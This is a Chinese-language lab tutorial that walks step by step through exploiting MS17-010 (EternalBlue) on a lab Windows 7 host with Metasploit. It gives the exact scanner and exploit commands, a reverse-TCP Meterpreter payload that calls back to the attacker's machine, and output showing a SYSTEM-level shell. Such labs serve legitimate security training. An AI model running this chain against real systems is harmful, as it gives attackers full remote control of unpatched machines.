MS17-010,公开名称为 EternalBlue,是 Microsoft 服务器消息块 (SMB) 协议实现中的一个关键漏洞。此漏洞允许远程攻击者在受影响的系统上执行任意代码。Metasploit Framework 是一个强大的开源工具,用于开发、测试和执行漏洞利用代码。
在本实验中,你将扮演一名渗透测试人员。你将使用 Metasploit Framework,首先使用扫描模块在网络上识别一个易受攻击的 Windows 7 机器。然后,你将配置并针对目标启动 EternalBlue 漏洞利用,通过 Meterpreter 会话获得完全的远程控制。这种实践经验将展示未修补漏洞的实际影响。
在本实验中,网络上存在一台易受攻击的 Windows 7 机器,其 IP 地址为 192.168.1.101。
在此步骤中,你将首先启动 Metasploit 控制台,并使用一个专门的扫描器模块来确认我们的目标易受 MS17-010 漏洞攻击。这是任何渗透测试中至关重要的侦察阶段。
首先,打开一个终端,通过运行 msfconsole 命令来启动 Metasploit Framework 控制台。这可能需要一些时间来加载。
msfconsole控制台加载完成后,你将看到 Metasploit 命令提示符 (msf6 >)。现在,使用 use 命令选择 MS17-010 扫描器模块。
use auxiliary/scanner/smb/smb_ms17_010接下来,你需要告诉扫描器要检查哪些主机。使用 show options 命令查看此模块的可用选项。
show options你将看到一个选项列表。RHOSTS 选项是必需的,它指定了要扫描的远程主机。将其设置为我们目标 Windows 7 机器的 IP 地址。
set RHOSTS 192.168.1.101设置好目标后,通过输入 run 来执行扫描器。
runMetasploit 现在将扫描目标。如果主机易受攻击,你将在输出中看到一条确认消息。
[+] 192.168.1.101:445 - Host is likely VULNERABLE to MS17-010! (OS: Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.1.101:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed此输出确认了 192.168.1.101 上的目标易受攻击,是我们的漏洞利用的良好候选者。
在此步骤中,在确认目标易受攻击后,你将在 Metasploit 中选择相应的漏洞利用模块。ms17_010_eternalblue 模块专为利用此特定漏洞而设计。
在 Metasploit 控制台中,再次使用 use 命令,但这次是加载漏洞利用模块。
use exploit/windows/smb/ms17_010_eternalblue执行命令后,你会注意到你的命令提示符已更改,以反映新选定的漏洞利用模块的上下文。这表明你现在正在 EternalBlue 漏洞利用的配置空间中工作。
msf6 exploit(windows/smb/ms17_010_eternalblue) >此模块包含将被发送到目标机器的代码,以利用 SMB 漏洞并允许你执行更多命令。
在此步骤中,你将配置漏洞利用模块以针对易受攻击机器的特定 IP 地址。虽然扫描器可以检查一系列 IP 地址,但漏洞利用必须定向到单个已确认的目标。
与扫描器模块一样,你可以使用 show options 命令查看漏洞利用的配置选项。
show options你会发现此模块也有一个 RHOSTS 选项,代表“远程主机”(Remote Hosts)。它目前是空白的。你必须将其设置为你在第一步中确认的 Windows 7 目标的 IP 地址。
使用 set 命令将 IP 地址 192.168.1.101 分配给 RHOSTS。
set RHOSTS 192.168.1.101Metasploit 将确认更改。
RHOSTS => 192.168.1.101现在漏洞利用模块知道要将攻击定向到何处。
在此步骤中,你将选择一个 payload。Payload 是在漏洞利用成功攻陷目标系统后将在目标系统上运行的代码。对于本次实验,你将使用 Meterpreter,这是一个高级的、可动态扩展的 payload。
windows/x64/meterpreter/reverse_tcp payload 是一个绝佳的选择。它会从目标机器创建一个连接回你的机器(一个“反向”shell),这通常能成功绕过防火墙。它也是为 64 位 Windows 系统设计的。
使用 set payload 命令来选择它。
set payload windows/x64/meterpreter/reverse_tcpMetasploit 将确认 payload 已设置。
payload => windows/x64/meterpreter/reverse_tcp尽管 Metasploit 通常会选择一个默认 payload,但显式设置它能确保你使用的是最适合你目标的 payload。你可以再次运行 show options 来查看漏洞利用和 payload 的选项。你会注意到新的选项,如 LHOST(监听主机)和 LPORT(监听端口),Metasploit 通常会自动将它们配置为你的机器的 IP 地址。
在此步骤中,所有选项都已配置完毕,你将启动漏洞利用并控制目标机器。
所有准备工作都已完成。漏洞利用已选定,目标已设置,payload 也已选择。要发起攻击,只需使用 exploit 命令。
exploitMetasploit 现在将尝试利用目标上的漏洞。在执行过程中,你将看到一些状态消息。如果成功,漏洞利用将传递 Meterpreter payload,你将看到一条指示“WIN!”的消息,并表明已打开一个新会话。
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >meterpreter > 提示符表示成功!你现在拥有了受害者机器上的一个远程 shell。为了证明你的控制权,运行 getuid 命令来查看你当前是以哪个用户账户运行的。
getuid输出应为:
Server username: NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 是 Windows 系统上的最高权限级别。你已成功攻陷目标。你还可以运行 sysinfo 来获取系统信息。
sysinfoComputer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows恭喜你,你已成功利用了 MS17-010。
在本次实验中,你使用 Metasploit Framework 对一个最知名的漏洞获得了实际操作经验。
你成功地:
ms17_010_eternalblue 漏洞利用模块。meterpreter payload 来建立远程连接。SYSTEM 级别的 Meterpreter 会话。本次练习突显了及时修补操作系统安全漏洞的极端重要性。一个未修补的漏洞就足以让攻击者完全控制一个系统。
